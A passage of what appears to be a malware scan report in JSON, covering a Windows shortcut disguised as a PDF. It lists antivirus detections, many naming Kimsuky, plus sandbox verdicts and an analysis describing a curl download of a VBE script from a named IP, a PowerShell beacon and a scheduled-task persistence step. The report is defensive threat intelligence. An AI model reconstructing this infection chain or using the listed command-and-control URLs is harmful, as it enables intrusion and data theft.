"category": "undetected",
"result": null
},
"Symantec": {
"method": "blacklist",
"engine_name": "Symantec",
"engine_version": "1.22.0.0",
"engine_update": "20260525",
"category": "malicious",
"result": "Scr.Mallnk!gen3"
},
"ESET-NOD32": {
"method": "blacklist",
"engine_name": "ESET-NOD32",
"engine_version": "18.2.18.0",
"engine_update": "20260526",
"category": "malicious",
"result": "LNK/Kimsuky.AD trojan"
},
"TrendMicro-HouseCall": {
"method": "blacklist",
"engine_name": "TrendMicro-HouseCall",
"engine_version": "24.550.0.1002",
"engine_update": "20260526",
"category": "malicious",
"result": "HEUR_LNKEXEC.A"
},
"Avast": {
"method": "blacklist",
"engine_name": "Avast",
"engine_version": "23.9.8494.0",
"engine_update": "20260515",
"category": "malicious",
"result": "Other:Malware-gen [Trj]"
},
"Cynet": {
"method": "blacklist",
"engine_name": "Cynet",
"engine_version": "4.0.3.4",
"engine_update": "20260526",
"category": "malicious",
"result": "Malicious (score: 99)"
},
"Kaspersky": {
"method": "blacklist",
"engine_name": "Kaspersky",
"engine_version": "22.0.1.28",
"engine_update": "20260526",
"category": "malicious",
"result": "HEUR:Trojan.Multi.GenBadur.genw"
},
"BitDefender": {
"method": "blacklist",
"engine_name": "BitDefender",
"engine_version": "7.2",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.GenericKD.79850702"
},
"NANO-Antivirus": {
"method": "blacklist",
"engine_name": "NANO-Antivirus",
"engine_version": "1.0.170.26895",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"ViRobot": {
"method": "blacklist",
"engine_name": "ViRobot",
"engine_version": "2014.3.20.0",
"engine_update": "20260526",
"category": "malicious",
"result": "LNK.S.Downloader.20398"
},
"Rising": {
"method": "blacklist",
"engine_name": "Rising",
"engine_version": "25.0.0.28",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.Kimsuky/LNK!8.17BBA (KTSE)"
},
"Sophos": {
"method": "blacklist",
"engine_name": "Sophos",
"engine_version": "3.5.1.0",
"engine_update": "20260526",
"category": "malicious",
"result": "Troj/DownLnk-AW"
},
"F-Secure": {
"method": "blacklist",
"engine_name": "F-Secure",
"engine_version": "18.10.1547.307",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.TR/Malware"
},
"DrWeb": {
"method": "blacklist",
"engine_name": "DrWeb",
"engine_version": "7.0.75.2070",
"engine_update": "20260526",
"category": "malicious",
"result": "LNK.Downloader.1067"
},
"VIPRE": {
"method": "blacklist",
"engine_name": "VIPRE",
"engine_version": "6.0.0.35",
"engine_update": "20260525",
"category": "malicious",
"result": "Trojan.GenericKD.79850702"
},
"TrendMicro": {
"method": "blacklist",
"engine_name": "TrendMicro",
"engine_version": "24.550.0.1002",
"engine_update": "20260526",
"category": "malicious",
"result": "HEUR_LNKEXEC.A"
},
"McAfeeD": {
"method": "blacklist",
"engine_name": "McAfeeD",
"engine_version": "1.2.0.14532",
"engine_update": "20260526",
"category": "malicious",
"result": "ti!169586B6EB36"
},
"SentinelOne": {
"method": "blacklist",
"engine_name": "SentinelOne",
"engine_version": "7.6.2.19",
"engine_update": "20260324",
"category": "undetected",
"result": null
},
"CTX": {
"method": "blacklist",
"engine_name": "CTX",
"engine_version": "2024.8.29.1",
"engine_update": "20260526",
"category": "malicious",
"result": "lnk.trojan.genbadur"
},
"Emsisoft": {
"method": "blacklist",
"engine_name": "Emsisoft",
"engine_version": "2024.8.0.61147",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.GenericKD.79850702 (B)"
},
"Ikarus": {
"method": "blacklist",
"engine_name": "Ikarus",
"engine_version": "6.4.16.0",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"GData": {
"method": "blacklist",
"engine_name": "GData",
"engine_version": "GD:27.44681AVA:64.31308",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.GenericKD.79850702"
},
"Jiangmin": {
"method": "blacklist",
"engine_name": "Jiangmin",
"engine_version": "16.0.100",
"engine_update": "20260525",
"category": "undetected",
"result": null
},
"Google": {
"method": "blacklist",
"engine_name": "Google",
"engine_version": "1779789766",
"engine_update": "20260526",
"category": "malicious",
"result": "Detected"
},
"Avira": {
"method": "blacklist",
"engine_name": "Avira",
"engine_version": "8.3.3.24",
"engine_update": "20260526",
"category": "malicious",
"result": "TR/Malware"
},
"Antiy-AVL": {
"method": "blacklist",
"engine_name": "Antiy-AVL",
"engine_version": "3.0",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan/Multi.GenBadur"
},
"Kingsoft": {
"method": "blacklist",
"engine_name": "Kingsoft",
"engine_version": "None",
"engine_update": "20260524",
"category": "malicious",
"result": "Win32.Troj.Unknown.a"
},
"Gridinsoft": {
"method": "blacklist",
"engine_name": "Gridinsoft",
"engine_version": "1.0.246.174",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"Xcitium": {
"method": "blacklist",
"engine_name": "Xcitium",
"engine_version": "38677",
"engine_update": "20260526",
"category": "malicious",
"result": "Malware@#3t9lln4pktog6"
},
"Arcabit": {
"method": "blacklist",
"engine_name": "Arcabit",
"engine_version": "2025.0.0.23",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.Generic.D4C26CCE"
},
"SUPERAntiSpyware": {
"method": "blacklist",
"engine_name": "SUPERAntiSpyware",
"engine_version": "5.6.0.1032",
"engine_update": "20260525",
"category": "undetected",
"result": null
},
"ZoneAlarm": {
"method": "blacklist",
"engine_name": "ZoneAlarm",
"engine_version": "6.25-116107039",
"engine_update": "20260526",
"category": "malicious",
"result": "Troj/DownLnk-AW"
},
"Microsoft": {
"method": "blacklist",
"engine_name": "Microsoft",
"engine_version": "1.1.26040.8",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan:Win32/WinLNK!AMTB"
},
"Varist": {
"method": "blacklist",
"engine_name": "Varist",
"engine_version": "6.6.1.3",
"engine_update": "20260526",
"category": "malicious",
"result": "LNK/ABTrojan.VPCN-"
},
"AhnLab-V3": {
"method": "blacklist",
"engine_name": "AhnLab-V3",
"engine_version": "3.30.0.10666",
"engine_update": "20260526",
"category": "malicious",
"result": "Downloader/LNK.Generic"
},
"Acronis": {
"method": "blacklist",
"engine_name": "Acronis",
"engine_version": "1.2.0.121",
"engine_update": "20240328",
"category": "undetected",
"result": null
},
"VBA32": {
"method": "blacklist",
"engine_name": "VBA32",
"engine_version": "5.6.1",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"TACHYON": {
"method": "blacklist",
"engine_name": "TACHYON",
"engine_version": "2026-05-26.02",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"Zoner": {
"method": "blacklist",
"engine_name": "Zoner",
"engine_version": "2.2.2.0",
"engine_update": "20260526",
"category": "malicious",
"result": "Probably Heur.LNKScript"
},
"Tencent": {
"method": "blacklist",
"engine_name": "Tencent",
"engine_version": "1.0.0.1",
"engine_update": "20260526",
"category": "malicious",
"result": "Win32.Trojan.Genbadur.Mjgl"
},
"Yandex": {
"method": "blacklist",
"engine_name": "Yandex",
"engine_version": "5.5.2.24",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"TrellixENS": {
"method": "blacklist",
"engine_name": "TrellixENS",
"engine_version": "6.0.6.653",
"engine_update": "20260525",
"category": "malicious",
"result": "LNK/Downloader.hbu"
},
"huorong": {
"method": "blacklist",
"engine_name": "huorong",
"engine_version": "b8a15cc:b8a15cc:e0fccfc:e0fccfc",
"engine_update": "20260525",
"category": "malicious",
"result": "Trojan/Generic!021C276024A3BE99"
},
"MaxSecure": {
"method": "blacklist",
"engine_name": "MaxSecure",
"engine_version": "1.0.0.1",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"Fortinet": {
"method": "blacklist",
"engine_name": "Fortinet",
"engine_version": "7.0.48.0",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"AVG": {
"method": "blacklist",
"engine_name": "AVG",
"engine_version": "23.9.8494.0",
"engine_update": "20260515",
"category": "malicious",
"result": "Other:Malware-gen [Trj]"
},
"Panda": {
"method": "blacklist",
"engine_name": "Panda",
"engine_version": "4.6.4.2",
"engine_update": "20260525",
"category": "undetected",
"result": null
},
"alibabacloud": {
"method": "blacklist",
"engine_name": "alibabacloud",
"engine_version": "2.2.0",
"engine_update": "20250321",
"category": "malicious",
"result": "Trojan[downloader]:Win/Agent.gyf"
},
"Avast-Mobile": {
"method": "blacklist",
"engine_name": "Avast-Mobile",
"engine_version": "260526-00",
"engine_update": "20260526",
"category": "type-unsupported",
"result": null
},
"SymantecMobileInsight": {
"method": "blacklist",
"engine_name": "SymantecMobileInsight",
"engine_version": "2.0",
"engine_update": "20260123",
"category": "type-unsupported",
"result": null
},
"BitDefenderFalx": {
"method": "blacklist",
"engine_name": "BitDefenderFalx",
"engine_version": "2.0.936",
"engine_update": "20260525",
"category": "type-unsupported",
"result": null
},
"DeepInstinct": {
"method": "blacklist",
"engine_name": "DeepInstinct",
"engine_version": "5.0.0.8",
"engine_update": "20260526",
"category": "type-unsupported",
"result": null
},
"Elastic": {
"method": "blacklist",
"engine_name": "Elastic",
"engine_version": "4.0.261",
"engine_update": "20260525",
"category": "type-unsupported",
"result": null
},
"Webroot": {
"method": "blacklist",
"engine_name": "Webroot",
"engine_version": "1.9.0.8",
"engine_update": "20250227",
"category": "type-unsupported",
"result": null
},
"APEX": {
"method": "blacklist",
"engine_name": "APEX",
"engine_version": "6.782",
"engine_update": "20260525",
"category": "type-unsupported",
"result": null
},
"Paloalto": {
"method": "blacklist",
"engine_name": "Paloalto",
"engine_version": "0.9.0.1003",
"engine_update": "20260526",
"category": "type-unsupported",
"result": null
},
"Alibaba": {
"method": "blacklist",
"engine_name": "Alibaba",
"engine_version": "0.3.0.5",
"engine_update": "20190527",
"category": "type-unsupported",
"result": null
},
"Trapmine": {
"method": "blacklist",
"engine_name": "Trapmine",
"engine_version": "4.0.12.0",
"engine_update": "20260504",
"category": "type-unsupported",
"result": null
},
"Cylance": {
"method": "blacklist",
"engine_name": "Cylance",
"engine_version": "3.0.0.0",
"engine_update": "20260521",
"category": "type-unsupported",
"result": null
},
"tehtris": {
"method": "blacklist",
"engine_name": "tehtris",
"engine_version": "v0.1.4",
"engine_update": "20260526",
"category": "type-unsupported",
"result": null
},
"Trustlook": {
"method": "blacklist",
"engine_name": "Trustlook",
"engine_version": "1.0",
"engine_update": "20260526",
"category": "type-unsupported",
"result": null
}
},
"times_submitted": 5,
"reputation": -57,
"type_extension": "lnk",
"sandbox_verdicts": {
"C2AE": {
"category": "malicious",
"malware_classification": [
"MALWARE"
],
"sandbox_name": "C2AE",
"malware_names": [
"LnkMalicious"
],
"confidence": 80
},
"Yomi Hunter": {
"category": "malicious",
"malware_classification": [
"MALWARE"
],
"sandbox_name": "Yomi Hunter"
},
"Dr.Web vxCube": {
"category": "malicious",
"malware_classification": [
"MALWARE"
],
"sandbox_name": "Dr.Web vxCube"
}
},
"type_description": "Windows shortcut",
"last_analysis_stats": {
"malicious": 38,
"suspicious": 0,
"undetected": 24,
"harmless": 0,
"timeout": 0,
"confirmed-timeout": 0,
"failure": 0,
"type-unsupported": 13
},
"total_votes": {
"harmless": 0,
"malicious": 6
},
"first_seen_itw_date": 1775464720,
"sigma_analysis_summary": {
"Joe Security Rule Set (GitHub)": {
"critical": 1,
"high": 0,
"medium": 0,
"low": 0
},
"Sigma Integrated Rule Set (GitHub)": {
"critical": 0,
"high": 9,
"medium": 7,
"low": 2
}
},
"crowdsourced_ai_results": [
{
"analysis": "This LNK file is malicious, designed to deceive users by masquerading as a PDF file (name 2026 4th K-ICTC Information.pdf.lnk with a .pdf icon location) while executing a multi-stage infection chain. It targets cmd.exe through a relative path, runs mode 15,1 to shrink the console window for stealth, downloads a Microsoft Script Encoder (VBE) file from a remote IP address (http://103.67.196.25/conf.dat) using the curl utility, saves it as c:\\users\\public\\music\\ant.vbe in the public users directory, and immediately executes the script. The Sigma matches in this report show the follow-on stages: obfuscated PowerShell spawned under WmiPrvSE.exe (so the VBE appears to launch it via WMI) that beacons to http://103.67.196.25//view1.php?type=apple&seed= with the host MAC address taken from getmac as the seed, and a scheduled task named Chrome_Update that runs wscript.exe /b on ant.vbe every 15 minutes for persistence. This behavior involves LOLBins (cmd, curl, wscript, powershell, schtasks), remote script delivery, and deceptive icon usage; several engines attribute the sample to Kimsuky. Practical hunting indicators are the 103.67.196.25 host, the ant.vbe path, and the Chrome_Update task name.",
"source": "palm",
"verdict": "malicious",
"category": "code_insight",
"id": "169586b6eb36b17520ef5afd206da86c4de89eb01d6294ba9631414271ba752f-file-palm"
}
]
}
}
}